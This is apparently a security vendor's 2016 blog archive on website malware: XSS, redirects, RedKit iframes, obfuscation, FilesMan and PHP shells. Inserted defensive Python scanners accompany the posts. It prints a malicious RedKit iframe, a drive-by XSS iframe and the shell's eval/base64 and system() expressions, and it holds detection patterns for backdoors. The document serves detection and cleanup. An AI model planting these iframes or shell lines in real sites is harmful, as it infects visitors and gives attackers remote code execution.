Wednesday, June 1, 2016

XSS - Cross Site Scripting Malware

What is Cross Site Scripting (XSS)?

On May 26th 2016, Jetpack disclosed an XSS vulnerability discovered in their popular plugin.
We would like to take this opportunity to describe what XSS is.

A Cross Site Scripting (XSS) attack refers to the injection of malicious code, or a malicious payload, into the pages of a legitimate website. When website users later visit these compromised pages, the injected malicious code (or payload) is executed by the client-side application (the visitor's web browser) and performs the actual malicious action, such as redirecting the visitor to another website, downloading and installing malicious code, showing adult ads, etc.

In most cases, injecting the malicious code does not require direct access to the website's files or internals. It exploits a particular kind of security vulnerability: the website or web application stores and later presents unvalidated user input. Unfiltered forms, pop-ups and other dynamic content are where a specially crafted string containing JavaScript code, or a link or iframe to another compromised website, can be planted.

XSS vulnerabilities can be trivial and detectable by an XSS vulnerability scanner. In their more complex variants, however, they may take several years to uncover (as with the Jetpack plugin, where the XSS vulnerability remained undetected since 2012).


XSS example

The following example shows a basic XSS vulnerability.

Take a look at the following web page:




If the comment variable contains plain text, the user's comment is presented as intended. But if the input contains something like:



Then, instead of presenting the text of the comment, the web browser handles the iframe tag and downloads the content of the iframe's URL,
which is http[://]thirdparty-site[.]xyz/drive-by-download-attack-page.php

This kind of attack is known as DOM-based XSS. The same result can be achieved directly on the server side during page/HTML generation.

The following PHP code depicts this kind of vulnerability:



If the get_user_last_comment_from_database() call returns the same string as in the previous example,
then instead of presenting the comment, this page will download malicious code from http[://]thirdparty-site[.]xyz/drive-by-download-attack-page.php
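As an added example (Python, not the post's own code), here is the flawed concatenation beside its hardened form, using the post's iframe payload as constructed input; the host name is a placeholder.

```python
import html

# Constructed sample: the comment string the post describes, with a placeholder host
# in place of the drive-by page (thirdparty-site.example is not a real site).
MALICIOUS_COMMENT = (
    '<iframe src="http://thirdparty-site.example/drive-by-download-attack-page.php" '
    'width="0" height="0"></iframe>'
)

def render_comment_vulnerable(comment: str) -> str:
    """The flawed pattern from the post: stored user input pasted straight into HTML,
    so the browser parses the iframe tag instead of showing it as text."""
    return '<div class="comment">' + comment + '</div>'

def render_comment_safe(comment: str) -> str:
    """Hardened form for the HTML-body context: entity-encode the input on output.
    html.escape(quote=True) turns < > & " ' into entities, so the payload is rendered
    as visible text and no iframe element is ever created."""
    return '<div class="comment">' + html.escape(comment, quote=True) + '</div>'

def has_live_iframe(markup: str) -> bool:
    """Crude self-check used here: does the rendered fragment still contain a real tag?"""
    return "<iframe" in markup.lower()

if __name__ == "__main__":
    for render in (render_comment_vulnerable, render_comment_safe):
        out = render(MALICIOUS_COMMENT)
        print(render.__name__, "-> live iframe:", has_live_iframe(out))
        print("   ", out)
```

The encoding must match the output context; html.escape covers the HTML body, while attribute, JavaScript and URL contexts need the encoders listed in the OWASP cheat sheet linked in the next section.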

How to prevent XSS attacks?

XSS-vulnerable web applications are an easy target, and it is just a matter of time until they are exploited by hackers. Hence, the first step is to verify that your website is not vulnerable. If you use third-party software modules, make sure proper input filtering is implemented. If you develop your own website, verify every piece of user input.

We think this is a good checklist for developers: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

How to detect XSS infection on your website?

Here at Quttera, we deal with XSS and other malware on a daily basis. If you need our help in identifying and removing the infection from your site, we are here to help.

ThreatSign! Website Antimalware scans and verifies every link on a scanned web page. A comprehensive report notifies website owners about detected malicious and blacklisted links.

Monday, May 30, 2016

SQLMAP.py - A friend or a foe


Security tools serving good and bad

SQLMAP.py is a Python script used by cyber security analysts to check websites for vulnerabilities. Like any other network security tool, it is used by many, meaning it is also used by the bad guys, a.k.a. "hackers". While browsing the dark web, we stumbled upon a hacking forum where you need to pass an exam before you can join the group. Such forums are nothing new to us, as there are a lot of hacking forums scattered over the net. What intrigued us most was the entrance exam: in order to become a member, a newcomer must prove themselves by taking over or defacing someone's site.

SQLMAP.py is used widely in the forum, as if it were the default tool for checking anyone's site. The forum administrator posts a list of sites that the newcomers are to attack with this tool. The majority of those sites run a CMS such as WordPress, Joomla or Magento. The CMS itself is usually not vulnerable; it just needs to be kept updated with the newest release, which means that outdated sites are very prone to attack.

Remediation

This is just an opening attack for newbie hackers, so most likely, if we deny them, they will stop right away. So what can we do to prevent this? It is always healthy to check your access logs from time to time for malicious or brute-force access to your site. If you find some, investigate where it is coming from; if you do not recognize the source, you can always block its IP from accessing your site. If you are a developer, or have your own developer, you can also put a lexical checker on your site to verify and filter the SQL commands sent to it.
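An added example (not from the post or from sqlmap) of the log review the paragraph recommends: it parses combined-format access log lines and flags clients by scanner User-Agent, SQL-shaped query strings and request bursts. The log lines are constructed and the addresses come from documentation ranges.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Scanner fingerprint in the User-Agent (sqlmap's default UA starts with "sqlmap/")
# and SQL-shaped fragments in the decoded query string.
TOOL_UA_RE = re.compile(r"\bsqlmap\b", re.I)
SQLI_RE = re.compile(
    r"union\s+(?:all\s+)?select|information_schema|\bsleep\s*\(|\bbenchmark\s*\(|"
    r"'\s*(?:and|or)\s+\d+\s*=\s*\d+", re.I)

def analyse(lines, burst_threshold=20):
    """Return {ip: sorted reasons} for clients worth a closer look."""
    reasons = defaultdict(set)
    requests = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                       # not in combined format; skip the line
        ip = m["ip"]
        requests[ip] += 1
        if TOOL_UA_RE.search(m["ua"]):
            reasons[ip].add("scanner user-agent")
        # decode %xx and '+' first so encoded payloads are matched in plain form
        if SQLI_RE.search(unquote_plus(m["path"])):
            reasons[ip].add("sql-shaped query string")
    for ip, n in requests.items():
        if n >= burst_threshold:
            reasons[ip].add(f"{n} requests in window")
    return {ip: sorted(r) for ip, r in reasons.items()}

# Constructed access log: two ordinary visits, then a burst of scanner traffic from
# one documentation-range address (198.51.100.7).
SAMPLE_LOG = [
    '203.0.113.5 - - [30/May/2016:10:01:02 +0000] "GET /about HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [30/May/2016:10:01:09 +0000] "GET /contact HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
] + [
    f'198.51.100.7 - - [30/May/2016:10:02:{i:02d} +0000] '
    '"GET /index.php?id=1%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 1024 '
    '"-" "sqlmap/1.0 (http://sqlmap.org)"'
    for i in range(25)
]

if __name__ == "__main__":
    for ip, why in analyse(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```

A changed User-Agent defeats the first check only; the query-string and burst checks still fire, which is why the three are combined.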

For more information on how to use the tool, please visit the sqlmap site at www.sqlmap.org

Malware clean-up

If you suspect that your website was infected with malware, Quttera experts are always happy to clean it for you and help prevent reinfection: Malware Monitoring & Cleanup Plans For Websites

Thursday, April 21, 2016

Traffic Redirection Malware On Website

Traffic Distribution System (TDS) On Infected Websites

This malware technique is widely used to monitor and redirect traffic from a compromised website to malicious content or paid referrals. In the past, we highlighted similar cases on our blog: Blacklisted website used to drive traffic to 'penny stock website'

Malicious TDS flow


Background

A ThreatSign! client received a complaint from his customer that the website got blocked when accessed from Google Chrome.

Malware details

An internal malware scan identified the infection inside the WordPress theme. Obfuscated malicious code generated a hidden iframe redirecting visitors to a TDS, from where they landed on third-party pages depending on location, web browser type and other parameters. In some cases, the user gets redirected to a fake Adobe player download page.

Obfuscated Malicious JavaScript Code

Decoded Malicious Iframe


Detection rate

Malware clean-up

Search for similar code inside your WordPress theme. If you suspect that your website was infected by this or similar malware, please select one of our Website Anti-malware Monitoring plans and our experts will be happy to clean it up for you.

Tuesday, April 19, 2016

RedKit Malware Still Alive


RedKit as detected by Online Malware Scanner


Background

Back in 2013, we posted about RedKit infecting a significant number of websites. It appears that, three years later, the statistics of the websites submitted to our online malware scanner show a revival of this malware among infected websites.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Malware entry

<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=hxxp://brg-catalogues[.]com/mzcf.html?j=1886263>

The URL in the src of the iframe hosts another ~15 similar HTML pages (mzcf.html) leading to a drive-by-download attack. Both domains are not flagged by Google, meaning that they have not yet been blacklisted:

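An added example (not the post's code) that applies both to the hidden TDS iframe in the previous post and to this RedKit entry: a Python check that parses iframe tags with quoted or bare attributes and flags those that are tiny or CSS-hidden and point off-site. The sample page and the host names in it are constructed placeholders.

```python
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
# name=value pairs; the value may be double-quoted, single-quoted or bare, as in the
# RedKit entry where every attribute value is unquoted.
ATTR_RE = re.compile(r"""([a-zA-Z_:-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))""")

def parse_attrs(attr_text):
    """Map lower-cased attribute names to their (unquoted) values."""
    out = {}
    for m in ATTR_RE.finditer(attr_text):
        name, dq, sq, bare = m.groups()
        out[name.lower()] = dq if dq is not None else sq if sq is not None else bare
    return out

def _px(value):
    """'2' or '2px' -> 2; anything else (missing, '100%') -> None."""
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value or "")
    return int(m.group(1)) if m else None

def hidden_iframes(page_html, page_host, max_px=10):
    """Return [(src, reasons)] for iframes that are both hidden and off-site.
    Hidden: a box of at most max_px on either side, or a hiding style.
    Off-site: the src host differs from the host serving the page."""
    findings = []
    for m in IFRAME_RE.finditer(page_html):
        attrs = parse_attrs(m.group(1))
        reasons = []
        w, h = _px(attrs.get("width")), _px(attrs.get("height"))
        if (w is not None and w <= max_px) or (h is not None and h <= max_px):
            reasons.append(f"tiny frame {w}x{h}")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("css-hidden")
        src = attrs.get("src", "")
        host = urlparse(src).hostname or page_host    # relative src = same host
        if reasons and host.lower() != page_host.lower():
            findings.append((src, reasons))
    return findings

# Constructed page: a normal embed, an iframe shaped like the RedKit entry above
# (same path, placeholder host), a CSS-hidden TDS hop, and a tiny but local frame.
SAMPLE_PAGE = """<html><body>
<iframe src="https://video.example/embed/abc" width="560" height="315"></iframe>
<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://malicious-host.example/mzcf.html?j=1886263>
<iframe src="http://tds-hop.example/go.php" style="display: none"></iframe>
<iframe src="/local/widget" height=1 width=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for src, why in hidden_iframes(SAMPLE_PAGE, "www.infected-site.example"):
        print(src, "->", ", ".join(why))
```

Iframes written by obfuscated JavaScript only appear in the rendered DOM, so run this over the page as a browser sees it, not just over the files on disk.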
Malware clean-up

Such malware is often hidden inside JavaScript files. If you suspect that your website was infected by similar malware, Quttera experts are always happy to clean it for you: Malware Monitoring & Cleanup Plans For Websites

Tuesday, April 12, 2016

Malicious JavaScript Popup On WordPress Websites



This infection was pulled from the list of malicious websites submitted by users to our free Online Website Malware Scanner. If your website visitors complain that they experience the same when they access your website, you were probably hit by the same malware.

Note: since the scan was completely outside-in (HTTP-based), we are not posting the PHP portion of the malware here.

Malicious Redirect

When this infection loads, your website visitor is presented with a "Checking your browser" window (see the screenshot below). A "Continue" button is there, asking for user action in order to complete this stage of the attack. When the user clicks this button, it generates a random URL that points to another page located on the same server. The URL has the prefix ?pagerd_

e.g. www.infected-domain.com/?pagerd_dclw7h

Malicious JavaScript Popup

When investigating further and following such a generated link, we got the following PHP errors:


These point to the malware in the infected footer.php file of the installed WordPress theme.

Summary

The above information shows the path to detect and remove the discussed malware. In order to stay safe and avoid future infection, it is essential to keep all passwords safe, keep WordPress files up to date and, of course, use only trusted and constantly updated/fixed plugins and themes.

If you suspect your website was compromised or would like us to remove the malware, please select from ThreatSign - website monitoring and malware clean-up plans. To run a free remote scan of your websites: http://quttera.com/website-malware-scanner

For other questions, do not hesitate to contact Quttera's help-desk.


Friday, April 8, 2016

jquery min php massive malware infection

Jquery.min.php Massive Infection Of WordPress And Joomla Websites


Background

During malware cleanup of our clients' websites, the same infection was noticed again and again. Additionally, when reviewing the latest malicious scan reports in our Online Website Malware Scanner, it could be seen that almost every third website is infected with this "disguised jquery" injection. To see this, just look at the latest submissions by visitors (last 2-3 hours) and click the View Code link in the Threat Dump section of the report.



Hence, this short post is to help you identify this malware on your website and avoid getting blacklisted.

Malicious Payload

Injected before the <head> tag on both the WordPress and Joomla platforms, this malicious script generates links to malware components on third-party infected websites. Breaking the malicious code into portions and hosting each one on a different website in a malicious chain is a common technique: it allows the code origin to be replaced each time, e.g. based on the clock.

jquery.min.php malware script




How to prevent (re)infection

Every day, attackers find new ways to hide backdoors, so it is safe to follow these rules to improve your protection:

  1. Back up your site.
  2. Keep your CMS version up to date.
  3. Change your passwords periodically. Most hackers try to brute-force the credentials.
  4. Change the database table prefix. This will avoid SQL injections.
  5. Add additional security by modifying .htaccess.
  6. In the case of WordPress, it is recommended to run both internal and external scans periodically with our plugin.
  7. Always keep plugins and themes updated to the latest version.

Thursday, April 7, 2016

Bypassing Antivirus Detection With JavaScript Obfuscation


JavaScript Code Obfuscation Or How To Bypass Antivirus Detection


A one-line definition of obfuscation from Wikipedia: "In software development, obfuscation is the deliberate act of creating obfuscated code, i.e. source or machine code that is difficult for humans to understand."

Obfuscated JavaScript code is a widely used technique to hide the original functionality of a given script. There is nothing malicious in obfuscation itself. Its valid uses include protecting the intellectual property of the developer or company that implemented a given script or library, compressing code, decreasing the size of the downloaded web page, etc.

Due to its popularity, there are plenty of free online obfuscators that easily translate simple JavaScript code into something unreadable and mostly impossible for a human to understand.

Let's run a simple example:

We have a simple JavaScript snippet. All it does is show a message window with the string "Obfuscated string":

    var a="Obfuscated string";
    function msg(m){alert(m);}
    msg(a);
Passing this script through the freely available online obfuscators http://javascriptobfuscator.com/ and http://javascriptcompressor.com/ gives us two completely different outputs:
var _0x86eb=["\x4F\x62\x66\x75\x73\x63\x61\x74\x65\x64\x20\x73\x74\x72\x69\x6E\x67"]; var a=_0x86eb[0];function msg(_0x988dx3){alert(_0x988dx3);} ;msg(a);
and
eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('3 0="4 5";6 1(2){7(2)}1(0);',8,8,'a|msg|m|var|Obfuscated|string|function|alert'.split('|'),0,{}))
Now we can go further and pass the output of the first obfuscator through the second one, which gives a result even further from the original script:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1 4=["\\9\\c\\i\\k\\2\\7\\8\\3\\b\\l\\d\\2\\3\\e\\f\\g\\h"];1 a=4[0];j 5(a){6(a)};5(a);',22,22,'|var|x73|x74|_0x86eb|msg|alert|x63|x61|x4F||x65|x62|x20|x72|x69|x6E|x67|x66|function|x75|x64'.split('|'),0,{}))
This far, without any special skills required, we have converted the original source code into something completely unrelated and "unreadable". Our intellectual property is safe, unless, of course, a group of hackers spends time on de-obfuscation (as history shows, nothing is 100% proof).
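An added Python example (not the post's code) that inverts both packer outputs above: it reimplements the word substitution the p,a,c,k,e,r function performs and then resolves the \xNN escapes the first obfuscator produced. The packed strings are copied from the post.

```python
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

# Packed outputs copied from the post: the (p, a, c, k) arguments of the two eval(...)
# calls, with k kept as the '|'-joined string the packer splits.
PACKED_1 = ('3 0="4 5";6 1(2){7(2)}1(0);', 8, 8,
            'a|msg|m|var|Obfuscated|string|function|alert')
PACKED_2 = (r'1 4=["\9\c\i\k\2\7\8\3\b\l\d\2\3\e\f\g\h"];1 a=4[0];j 5(a){6(a)};5(a);',
            22, 22,
            '|var|x73|x74|_0x86eb|msg|alert|x63|x61|x4F||x65|x62|x20|x72|x69|x6E|x67'
            '|x66|function|x75|x64')

def unpack(p, a, c, k):
    """Invert the 'p,a,c,k,e,r' transform: each word token in p is a base-`a` number
    indexing the word list k. Tokens that are not base-a numbers, or whose entry is
    empty, are left untouched, which is what the original packer does too."""
    words = k.split("|")
    if len(words) != c:
        raise ValueError("word count does not match c")
    valid = set(DIGITS[:a])

    def restore(m):
        tok = m.group(0)
        if not set(tok) <= valid:
            return tok                  # e.g. a real identifier such as 'a' in base 8
        idx = int(tok, a)
        return words[idx] if idx < len(words) and words[idx] else tok

    return re.sub(r"\b[A-Za-z0-9_]+\b", restore, p)

def decode_hex_escapes(js):
    """Second layer from javascriptobfuscator.com: string literals written as \\xNN."""
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), js)

def deobfuscate(packed):
    """Unpack, then resolve hex escapes; returns readable JavaScript source."""
    return decode_hex_escapes(unpack(*packed))

if __name__ == "__main__":
    print(deobfuscate(PACKED_1))
    print(deobfuscate(PACKED_2))
```

The same two layers are what an analyst peels off by hand; doing it statically, as here, avoids executing the sample at all.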

Hiding malicious code in the web

Unfortunately, JavaScript obfuscation is used not only for legal and legitimate purposes. Almost every exploit kit (for example http://en.wikipedia.org/wiki/Blackhole_exploit_kit) utilizes JavaScript obfuscation algorithms in order to bypass antivirus protection and invisibly inject malware into the victim's PC or touch devices.

Worth mentioning: website malware cases are being collected with our public online Website Malware Scanner. Some cases of the execution flow of JavaScript threats:
Looking at the analysis, we can see that the target of all these threats is to inject a hidden iframe, which finally redirects the visitor's browser to a malware distribution server. A successful attack results in malware silently installed on the PC or touch device that was used to visit the infected website.

So why does JavaScript obfuscation bypass antivirus detection?

There are a few integral parts playing a major role in this puzzle. First of all, JavaScript itself is a simple and very rich language that provides the possibility of dynamic generation and execution of script code using the eval and unescape methods. This fact, backed by all the modern obfuscation techniques, makes it simply impossible to detect such a payload using the pattern-based engines utilized by antiviruses.
Antiviruses are still an essential part of the secure perimeter, as they are capable of preventing access to links to known infected web servers that distribute malware. Obviously, the remaining issue is that thousands of new web servers are hacked and compromised day by day, while it takes some time until such web servers get listed in antivirus blacklists.


Friday, April 1, 2016

FilesMan Backdoor Malware On Your Computer

FilesMan is being abused in the wild

What is FilesMan? It is a file manager used to explore the files on a computer. It is the most basic malware tool that attackers upload to your website as a form of backdoor to browse your files. Some of these file managers are sophisticated and have their own GUI (Graphical User Interface); some are capable of uploading and downloading files from your website as if the attackers were sitting in front of your computer browsing it personally.

Do I have this malware on my website?

So how do you spot whether your website has it? A string search for "FilesMan" would actually do the trick. However, most attackers use heavy obfuscation so that you can't detect it by simple string searching. You may also want to look for split strings; this technique is also widely used to outsmart string searching by site owners.

This is an example of an ordinary FilesMan that can be found by searching your system:
FilesMan backdoor malware

While this one has been concatenated and can still be found using a regular expression:
FilesMan obfuscated with string split applied.


Other well-known file managers that are abused in the wild have a GUI and can be found almost anywhere on the internet:

C99 Madshell:
C99 Madshell


b374k-shell:
b374k


How to prevent the infection

Every day, attackers find new ways to hide backdoors, so it is safe to follow these rules to improve your protection:
  1. Back up your site.
  2. Keep your CMS version up to date.
  3. Change your passwords periodically. Most hackers try to brute-force the credentials.
  4. Change the database table prefix. This will avoid SQL injections.
  5. Add additional security by modifying .htaccess.
  6. In the case of WordPress, it is recommended to run both internal and external scans periodically with our plugin.
  7. Always keep plugins and themes updated to the latest version.

Still got infected and/or blacklisted?

No worries. There are no bulletproof websites. Here at Quttera, we clean this and other kinds of malware on a daily basis. If you'd like our malware analysts to help you, just select the appropriate ThreatSign! anti-malware plan and get back online.

For other issues and help: Quttera's help-desk

Wednesday, March 2, 2016

Malware Targeted Zend Security Framework

Background


Redirections are commonly and widely abused nowadays. Here at Quttera, we deal with them on a daily basis when cleaning ThreatSign! customers' websites and servers. However, this particular one really got our attention, since it cannot be seen with the "naked eye" and it resides in one of the many plugins of the site.

The redirection exploits the API used by the site: the malware hooks the API call, intercepts the parameter and replaces it with its own code, which is then executed back on the original site.


Malware Analysis

When we debugged the site:






Stepping inside the API to locate the function, we found that the file below is nowhere to be found:




The HTML variable is the "storage" of the first redirection. When executed, it redirects again to another download site:




Checking common sources that could lead to redirections, such as .htaccess, wp_redirects, etc., didn't give any results.

Detection and Malware Details

After in-depth analysis and signature searching, we found out that it hides in one of the plugins installed on the site. Due to the huge number of plugins the site was using, it took us a bit of time to trace where it leads, and voilà! Behold the code below. Remember the screenshots above? The code is a match!





There were also a handful of functions in this specific module, such as:
  1. Check for ZEND Security Upgrade Version
  2. API Response Handling
  3. Redirection Settings
  4. Content Generator


Sunday, February 14, 2016

How Hackers Prevent Linux Malware From Being Removed

Malware On Linux

Background

Here at Quttera, we clean infected websites on a daily basis, and this weekend our automated cure procedure failed to remove malicious files. The customer actually had more than 170 websites on the Linux server, which was heavily infected. The automatic cure is executed with root permissions, so we started investigating what this was all about.

Investigation

We logged in to the infected server and executed a few commands as the root user, such as


and we got "Permission denied".




At first we thought there was an issue with the parent directory permissions, but after a quick verification we confirmed that the permissions were OK.

The next step was to look for a running process that prevents the file from being removed; however, the lsof output did not confirm this.

It is no surprise that hackers are constantly changing tactics and improving techniques. This allows them to:

  1. Keep an infection undetected on a compromised server or website for as long as possible.
  2. Make it harder to clean or remove.

And one of the main challenges is staying on top of those threats as they evolve.

We continued with further investigation, and the next step was to use the lsattr command, which lists file attributes on a Linux second extended file system. We executed lsattr on the locked file, and the file had the "a" and "i" attributes set.

You can always look up the lsattr command description through 'man' on Linux. That is how we came across the chattr command, which led us to the following:

  1. chattr changes file attributes on a Linux second extended file system.
  2. A file with the "i" attribute cannot be modified: it cannot be deleted or renamed, no link can be created to it and no data can be written to it. Only a super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.
  3. A file with the "a" attribute set can only be opened in append mode for writing. Only the super-user or a process possessing the CAP_LINUX_IMMUTABLE capability can set or clear the attribute.

So, to make a long story short, the solution was to run:


and




which allowed us to remove the file without any problem.
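An added Python example (not the post's code) for the lsattr step: it parses lsattr output, lists the entries carrying the "i" or "a" attribute and builds the chattr command that clears them before removal. The lsattr lines and paths are constructed.

```python
import shlex

# Constructed lsattr output: e2fsprogs prints the attribute field, a space, then the
# path. The paths below are invented for the demo.
SAMPLE_LSATTR = """\
----i-a-------e------- /var/www/html/wp-content/uploads/.cache.php
--------------e------- /var/www/html/wp-content/uploads/photo.jpg
----i---------e------- /var/www/html/.htaccess
"""

# The two attributes the post describes; both need CAP_LINUX_IMMUTABLE to clear.
LOCKING_FLAGS = {"i": "immutable", "a": "append-only"}

def parse_lsattr(output):
    """Yield (path, set of attribute letters) for each line of lsattr output."""
    for line in output.splitlines():
        if not line.strip():
            continue
        flags, _, path = line.partition(" ")   # the path itself may contain spaces
        yield path, {ch for ch in flags if ch.isalpha()}

def locked_files(output):
    """Return {path: set of locking letters} for entries that cannot be removed
    until the attribute is cleared."""
    locked = {}
    for path, flags in parse_lsattr(output):
        hit = flags & set(LOCKING_FLAGS)
        if hit:
            locked[path] = hit
    return locked

def unlock_argv(path, flags):
    """argv for the chattr call that clears exactly the locking flags present
    (chattr -ia, -i or -a); it must run as root before rm."""
    letters = "".join(f for f in "ia" if f in flags)
    return ["chattr", "-" + letters, path]

def unlock_commands(output):
    """Shell lines a cleanup tool would log before removal; nothing is executed here."""
    return [shlex.join(unlock_argv(p, f)) for p, f in locked_files(output).items()]

if __name__ == "__main__":
    for path, flags in locked_files(SAMPLE_LSATTR).items():
        print(path, "->", ", ".join(LOCKING_FLAGS[f] for f in sorted(flags)))
    print("\n".join(unlock_commands(SAMPLE_LSATTR)))
```

A cleanup routine that runs as root and still gets "Permission denied" should consult lsattr before assuming a permissions or open-file problem.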



What is the "Linux second extended file system"?

The second extended file system (Ext2) is the grandparent of the Ext4 file system used by the Linux kernel.
Ext2 was used as the default file system by several Linux distributions and was later replaced by Ext3.
You can find more information about Ext2 here


Saturday, January 30, 2016

New Generic PHP Shell Malware In The Wild


Shell body

Background

A massive infection in the form of a new generic PHP shell has recently been detected by Quttera malware researchers. We are still investigating all the incidents to find out the exact infection vector. Here is what we know so far:
  1. In most cases this shell was uploaded as wp-update.php to the WordPress root directory.
  2. On almost all sites where we detected this shell, all JavaScript files were infected with malicious JavaScript code injecting references to malicious iframes.
  3. This is a generic shell script: it executes content provided in a $_POST argument called "sam".

How this shell works

  1. First, it resets the time it was last accessed using the @touch function.
  2. Then it checks whether the eval function is available by executing the following statement: $l = eval("return true")
  3. After that, it decides how to execute the encoded script provided in the $_POST[sam] variable.
  4. If eval is available, the infection is delivered using the following expression: eval(base64_decode($_POST[sam]))
  5. If eval is not available, the shell dumps the provided script into a temporary file _ptemp and executes it using the "system" command: system("php _ptemp;rm _ptemp");
  6. The injected infection body depends on the input provided in the $_POST[sam] variable.
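An added Python example (not the posts' code) that serves both this post and the FilesMan post above: an indicator scan for PHP sources that matches FilesMan and b374k even when the name is split across concatenated strings, plus the three expressions this shell is described as using. The sample fragments are constructed and are not working shells.

```python
import os
import re

# A PHP string can be split into concatenated pieces ('Fi'.'les'."Man"); allow that
# gap between any two characters of a keyword so a plain grep cannot be dodged.
GAP = r"""(?:['"]\s*\.\s*['"])?"""

def split_tolerant(word, flags=0):
    """Compile a pattern matching `word` even when split across PHP concatenations."""
    return re.compile(GAP.join(re.escape(ch) for ch in word), flags)

# Indicators taken from the two posts: the FilesMan and b374k file managers, and the
# three expressions the wp-update.php generic shell is described as using.
INDICATORS = {
    "FilesMan file manager": split_tolerant("FilesMan"),
    "b374k shell": split_tolerant("b374k", re.I),
    "eval of POSTed base64": re.compile(
        r"eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST)\s*\[", re.I),
    "eval availability probe": re.compile(r"""eval\s*\(\s*['"]return\s+true['"]\s*\)"""),
    "temp-file php exec": re.compile(r"""system\s*\(\s*['"]php\s+\S+\s*;\s*rm\s+""", re.I),
}

def scan(source):
    """Return the names of all indicators present in one source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]

def scan_tree(root, exts=(".php", ".js", ".html")):
    """Walk a web root and yield (path, indicators) for every file that hits."""
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan(fh.read())
            except OSError:
                continue
            if found:
                yield path, found

# Constructed fragments (not working shells): the plain and split FilesMan strings the
# earlier post shows, the expressions quoted above for the generic shell, and a clean file.
SAMPLES = {
    "plain": '<?php if (isset($_GET["FilesMan"])) { /* ... */ } ?>',
    "split": "<?php $m = 'Fi'.'les' . \"Man\"; ?>",
    "generic": ('... $l = eval("return true"); ... eval(base64_decode($_POST["sam"])) ...'
                ' system("php _ptemp;rm _ptemp"); ...'),
    "clean": '<?php echo htmlspecialchars($_POST["comment"]); ?>',
}

if __name__ == "__main__":
    for label, src in SAMPLES.items():
        print(f"{label:8} -> {scan(src) or 'no indicators'}")
```

Names built from chr() calls or hex escapes are not caught by the concatenation gap; decode those layers first, then run the scan over the result.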